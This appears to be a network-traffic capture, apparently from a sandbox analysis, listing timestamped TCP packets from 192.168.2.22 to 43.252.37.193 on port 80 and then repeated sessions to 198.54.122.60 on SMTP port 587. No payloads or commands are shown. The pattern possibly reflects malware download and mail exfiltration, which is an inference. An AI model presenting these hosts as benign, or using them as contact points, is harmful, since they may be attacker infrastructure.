Feb 4, 2021 09:05:39.714302063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.714313984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.714365959 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.714415073 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.714421034 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.911294937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.911324024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.911339998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.911351919 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.911372900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:39.911437988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.911524057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.911545038 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.911552906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:39.911560059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.108302116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.108335972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.108422995 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.108469963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.108524084 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.108544111 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.108635902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.108690023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.305255890 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.305285931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.305305004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.305450916 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.305474043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.305546045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.502703905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.502779961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.502826929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.502868891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.503026009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.503077030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.699863911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.699918985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.699948072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.699985981 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.700021029 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.700057030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.700160027 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.702128887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.897644043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.897677898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.897691965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.897705078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.897913933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.898775101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.898803949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:40.898875952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:40.898896933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.094913960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.094944954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.094959021 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.095139980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.095184088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.095191956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.095563889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.095582962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.095669985 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.095720053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.296264887 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.296328068 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.296369076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.296408892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.296490908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.296544075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.296550035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.298681974 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.493750095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.493781090 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.493988991 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.495357037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.495381117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.495584965 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.692387104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.692429066 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.692662954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.693773985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.693809032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.693867922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.693897009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.889540911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.889605999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.889796972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.890790939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.890831947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.890880108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.890923023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:41.890928030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.890964031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:41.890983105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.086945057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.087201118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.087658882 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.087714911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.087790966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.087811947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.087826014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.087865114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.087981939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.089315891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.285012960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.285058975 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.285082102 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.285105944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.285296917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.285375118 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.285382986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.285387993 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.482137918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.482198000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.482234955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.482235909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.482274055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.484150887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.679137945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.679198027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.679238081 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.679356098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.680212975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.876199007 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.876291990 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.876471996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.876547098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.876830101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.876915932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:42.877024889 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:42.877099037 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:43.073419094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:43.073510885 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:43.073669910 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:43.073833942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:43.073882103 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:43.073899984 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:43.270529985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:43.270575047 CET	80	49165	43.252.37.193	192.168.2.22
Feb 4, 2021 09:05:43.270890951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:05:43.727066994 CET	49165	80	192.168.2.22	43.252.37.193
Feb 4, 2021 09:06:18.848769903 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.040550947 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.040684938 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.233006954 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.233616114 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.424722910 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.424916029 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.425992012 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.617299080 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.663099051 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.834784031 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.854347944 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.855622053 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.855650902 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.855671883 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.855699062 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:19.855815887 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.855840921 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.855910063 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:19.855915070 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:20.026115894 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:20.026216030 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:20.026352882 CET	587	49166	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:20.026421070 CET	49166	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:25.560193062 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:25.751526117 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:25.751606941 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:25.943409920 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:25.943824053 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:26.134519100 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.134624958 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.134938955 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:26.325604916 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.326400995 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:26.517227888 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.518729925 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.518758059 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.518780947 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.518804073 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.518925905 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:26.536842108 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:26.727628946 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.728526115 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.728549957 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:26.728817940 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:28.222738981 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:28.413539886 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:28.413985014 CET	587	49167	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:28.414058924 CET	49167	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:33.706902027 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:33.898608923 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:33.898799896 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.091142893 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.092901945 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.284517050 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.284837008 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.287007093 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.477701902 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.478661060 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.669398069 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.669435024 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.669449091 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.669563055 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.671125889 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.768820047 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:34.861799955 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.861833096 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.959599018 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.960310936 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:34.961848021 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.152607918 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.153564930 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.154231071 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.344873905 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.346820116 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.348372936 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.539146900 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.542284966 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.542803049 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.733870983 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.755983114 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.757031918 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.948673010 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.949232101 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:35.953583002 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.954507113 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.954916000 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.955806971 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:35.961940050 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.144455910 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.145251036 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.145426989 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.145699024 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.146958113 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.147075891 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.152834892 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.153321981 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.337706089 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.337826967 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.337990046 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.338023901 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.344003916 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.344172955 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.528814077 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.528839111 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.528987885 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.535248995 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.535268068 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.535396099 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.535450935 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.719820976 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.719858885 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.720072031 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.726089954 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.726119041 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.726140022 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.726249933 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.726290941 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.726888895 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.727138996 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.910895109 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.910933971 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.910959959 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.911046028 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.911072969 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.911098003 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.911120892 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.911529064 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.917083979 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.917119980 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.917649031 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:36.917679071 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:36.917692900 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:37.102303982 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:37.108346939 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:37.118536949 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:37.334713936 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:42.732151985 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:42.924580097 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:42.925111055 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:42.925201893 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:42.926075935 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:42.926338911 CET	49169	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.037987947 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.125323057 CET	587	49169	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.230700970 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.230865955 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.423887014 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.424370050 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.614846945 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.615233898 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.615542889 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.806044102 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.807013988 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:43.997664928 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.997781992 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.997812033 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:43.997977018 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:44.000000954 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:44.053834915 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:44.191427946 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:44.191534042 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:44.245579004 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:44.246150970 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:44.249443054 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:44.439965010 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.443561077 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.444390059 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:48.635206938 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.637809992 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.638629913 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:48.829210043 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.832402945 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:48.833404064 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.023952007 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.043711901 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.045418978 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.235977888 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.236593008 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.237437963 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.237739086 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.237859011 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.240488052 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.244949102 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.427972078 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.428191900 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.428303003 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.429128885 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.430948973 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.433459044 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.435460091 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.435661077 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.619687080 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.619910955 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.624018908 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.624181986 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.626199007 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.626245975 CET	587	49170	198.54.122.60	192.168.2.22
Feb 4, 2021 09:06:49.626298904 CET	49170	587	192.168.2.22	198.54.122.60
Feb 4, 2021 09:06:49.626347065 CET	49170	587	192.168.2.22	198.54.122.60
